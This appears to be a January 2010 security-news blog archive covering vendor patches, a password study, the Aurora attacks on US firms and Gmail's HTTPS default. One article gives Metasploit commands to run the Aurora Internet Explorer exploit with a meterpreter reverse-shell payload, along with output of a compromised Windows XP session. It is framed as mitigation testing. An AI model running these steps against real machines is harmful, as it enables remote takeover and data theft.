Monthly Archives: January 2010

Cisco Releases Security Advisory for Unified MeetingPlace

Filed under Security News
Cisco has released a security advisory to address multiple vulnerabilities in Unified MeetingPlace. These vulnerabilities may allow a remote, unauthenticated attacker to obtain sensitive information, manipulate configuration data, create unauthorized accounts, operate with elevated privileges or cause a denial-of-service condition.

US-CERT encourages users and administrators to review Cisco security advisory cisco-sa-20100127-mp and apply any necessary updates to help mitigate the risks.

Google Releases Chrome 4.0.249.78

Filed under Security News
Google has released Chrome 4.0.249.78 for Windows to address multiple vulnerabilities. These vulnerabilities may allow an attacker to execute arbitrary code, obtain sensitive information, bypass security restrictions, or cause a denial-of-service condition.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and update to Chrome 4.0.249.78 for Windows to help mitigate the risks.

Password security a tall order for many web users

Filed under Security News
A recently released study from tech researcher Imperva showed that the most popular password among users whose accounts were compromised in the recent RockYou data breach was as follows: 123456.

Experts say that weak passwords are one of the Achilles' heels of modern network security, since most people tend to use the same easy-to-guess password on multiple sites. Over half of the users whose accounts Imperva analyzed from the RockYou case chose passwords made up only of alphanumeric characters, which made them much easier to break into.

As it happens, 123456 was also the most popular password among Hotmail users whose accounts were similarly compromised in a large-scale phishing attack that took place in October 2009. "Password" was also one of the most common passwords discovered by Imperva in the RockYou incident.

IT security professionals can take several steps to help beef up password security at their company, including creating rules that govern password length and content (e.g., no five-character passwords; each password must contain at least one number and at least one special character) and making sure that no password can be discovered by a simple dictionary attack.
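The rules described above can be checked at password-set time. The following is an added example, not part of the original post: the wordlist is a constructed sample, the eight-character minimum is an assumption (the post only rules out five-character passwords), and the function names are hypothetical. It shows why the dictionary check has to normalize the password first, since "Password1!" satisfies every composition rule.

```python
import re

# Constructed sample wordlist; a real deployment would load a large
# list of breached passwords instead (assumption, not from the post).
COMMON = {"password", "123456", "rockyou", "letmein", "qwerty"}

# Undo common character substitutions before the dictionary lookup.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

MIN_LENGTH = 8  # assumed minimum length


def dictionary_candidates(password):
    """Return normalized forms of the password to look up in the wordlist."""
    lowered = password.lower()
    # Strip leading/trailing digits and symbols: "password1!" -> "password".
    core = re.sub(r"^[^a-z]+|[^a-z]+$", "", lowered)
    # Also undo substitutions: "p@ssw0rd" -> "password".
    return {lowered, core, lowered.translate(LEET), core.translate(LEET)}


def check_password(password):
    """Return a list of policy violations; an empty list means accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too short")
    if not re.search(r"\d", password):
        problems.append("no digit")
    if not re.search(r"[^A-Za-z0-9]", password):
        problems.append("no special character")
    if any(c in COMMON for c in dictionary_candidates(password)):
        problems.append("dictionary-derived")
    return problems


if __name__ == "__main__":
    for pw in ("123456", "Password1!", "P@ssw0rd1!", "tr4il-Mix&92kd"):
        print(pw, check_password(pw) or "accepted")
```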

Apple releases patches for OS X security flaws

Filed under Security News
Vulnerabilities in OS X 10.5 and 10.6 were addressed in Apple's first security update of 2010, patching a dozen known security holes in the Mac operating system.

While five of the vulnerabilities were inherent in Apple's own software, the other seven were found in Adobe's Flash Player plug-in, which could lead to remote code execution and other serious issues. Experts say that Flash Player is fast developing a reputation as one of the most popular targets for would-be cyber criminals.

Media functionality was at the heart of the remaining problems as well, as Apple fixed vulnerabilities involving maliciously crafted .mp4 audio files, .dng images, and .tiff images. The company's latest round of patches also fixed a months-old vulnerability in OpenSSL, which could have allowed attackers to breach network security and alter protected internet sessions.

PC Magazine security blogger Larry Seltzer questions the timing of the OpenSSL patch, since OpenSSL itself released a fix for the problem "almost immediately" after the discovery of the vulnerability. "It's not clear what took Apple so long," writes Seltzer.

Cloud network security concerns prompt Microsoft to propose new laws

Filed under Security News
Microsoft's general counsel, Brad Smith, told an audience at the Brookings Institution today that the government should step in to regulate the emerging cloud computing industry and help protect businesses and consumers from fraud and abuse.

Smith said that a survey Microsoft conducted recently found that 58 percent of the general public and 86 percent of industry leaders were "excited" at the prospect of cloud computing solutions, but that 90 percent of all respondents had serious concerns about security or privacy.

Smith proposed that Congress pass a Cloud Computing Advancement Act, which, he said, would give the government the necessary powers to address those concerns, as well as protect international sovereignty. He also called on senators and representatives to beef up the Computer Fraud and Abuse Act, to provide assistance to law enforcement efforts in the cloud.

Many experts agree that the cloud poses significant security challenges, due in part to its more open nature and in part to the growing organization and sophistication of the latest generation of cyber criminals.

France and Germany warn citizens to avoid using Internet Explorer

Filed under Security News
The governments of both France and Germany have issued official warnings to their citizenry, saying that, until Microsoft releases a patch for the widely-used Internet Explorer web browser, it is a threat to network security and should not be used.

Tech news website eWeek reports that the exploit that has caused such widespread concern in Europe is the same one that was used to attack a number of corporate systems in the U.S., including Google's; that attack has since led Google to announce that it would cease cooperation with the Chinese government. Concerns have been raised about the Chinese government's possible involvement in the attacks.

The French and German governments both advised their citizens to switch to alternative web browsers, while eWeek reports that Microsoft has said the vulnerability can be avoided with a switch to Internet Explorer 8, thought to be immune to the exploit.

The French information agency CERTA said in a statement that it strongly advised users to disable dynamic code and to browse the internet with limited user rights active on the machine.

Network security could be tested by bigger, badder DDoS attacks

Filed under Security News
Botnets of ever-expanding size could be used to perform large-scale distributed denial of service attacks against selected computers, experts say, disrupting some of the internet's most basic functionality.

Andy Ellis, the CSO of Akamai Technologies, told CIO magazine that it's possible that even the creators of the botnets are not fully aware of how widely their creations have spread, though PC World reports that a quarter of botnet-infected PCs are in enterprise networks.

Ellis also said that the DDoS attacks of today are far more sophisticated than the worm-created ones of the past. Instead of techniques like Mydoom or Blaster, which dramatically slow the machines that they infect, CIO reports, the botnets target servers with a flood of seemingly licit connection requests. The resultant slowdown affects only the targeted machine, which can easily use up all of its allotted bandwidth and cease to be accessible.

Experts say that botnets typically spread via phishing and some types of worm programs, which can automatically spread themselves across a network without any action by a human user beyond the initial infection.

Security flaw in IE used to target U.S. firms in cyber attack

Filed under Security News
Microsoft announced yesterday that the cyber criminals who launched a large-scale assault on network security at multiple American firms did so via a vulnerability in the company's Internet Explorer browser software.

A security alert released by the company said that IE 6 installations running on some less commonly used versions of Windows were vulnerable, as well as IE 6, 7, and 8 installations on Windows XP, Vista, Server 2003/2008, and Windows 7. Microsoft has said that it is working on a solution and could release an off-cycle update to repair the vulnerability.

CNET reports that source code was stolen from over 30 U.S. firms targeted in the attack, including Adobe, Yahoo, Symantec, and Dow Chemical, though only Adobe has issued an official confirmation that it was attacked.

Experts say that setting IE's security features to maximum prevents the attack from gaining access to valuable personal or company data. According to PC Magazine, this implies the exploit targets IE's unprivileged context, outside of which it is unlikely to cause many problems.

Reproducing the “Aurora” IE Exploit

Filed under Articles
Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync the latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands shown after each msf prompt:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

Gmail improves network security for clients

Filed under Security News
Secure HTTP access to Google's free Gmail service is now active by default, the company announced earlier this week, making Gmail messages less susceptible to unauthorized access.

Google says that the new functionality will help protect users who have not already switched to HTTPS. The company wrote on the official Gmail blog that it had carefully weighed the tradeoffs between security and speed, since HTTPS data transfers tend to move slightly slower than those sent without encryption.

The option to use HTTPS for Gmail connections has been present since 2008, but it was turned off by default. Users will still be able to use Gmail over standard HTTP, but Google says that only those users confident in their network security settings should disable HTTPS.

PC World speculates that the move may have been prompted by the recent hacking attempts by Chinese cyber criminals to gain access to the email accounts of human rights campaigners. The attack has also provoked a decision by Google to stop filtering search results for its Google.cn portal, which is likely a signal of the end of the company's presence in China.